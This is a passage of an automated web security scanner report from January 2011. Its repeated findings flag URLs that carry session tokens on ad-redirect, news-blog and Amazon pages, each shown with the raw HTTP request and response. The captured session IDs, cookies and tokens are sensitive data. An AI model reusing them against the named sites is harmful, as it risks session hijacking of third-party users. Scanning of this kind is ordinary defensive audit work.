Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.55. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.56. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.57. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.58. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.59. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.60. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.61. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.62. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.63. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.64. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.65. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.apture.com/js/apture.js?siteToken=5rLcDWk

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fs7cao9ricm3m32upt64vdhf53; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:02:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:02:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</div>
<script type='text/javascript' id='aptureScript' src='http://www.apture.com/js/apture.js?siteToken=5rLcDWk' charset='utf-8'></script>
...[SNIP]...

9.66. http://www.amazon.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=0SBFNHA40PDAQCKXW60Q&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:22 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
x-amz-id-1: 0SBFNHA40PDAQCKXW60Q
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: qBgIWFuA2Wjoamon8NoAG9bdAoR3KqlibGyFaWE7CQvIKyPWqQkJunDX652P1Cp2
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 141800


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...
<div class="bannerImage"><a href="/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=0SBFNHA40PDAQCKXW60Q&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" />
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.67. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_10/191-9849773-1831958?location=http://www.pcworld.com/article/202146/amazon_kindle_3_the_best_kindle_yet.html&token=D9CB6E2A29AB1E9D9FDC167523A8318384D83181&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
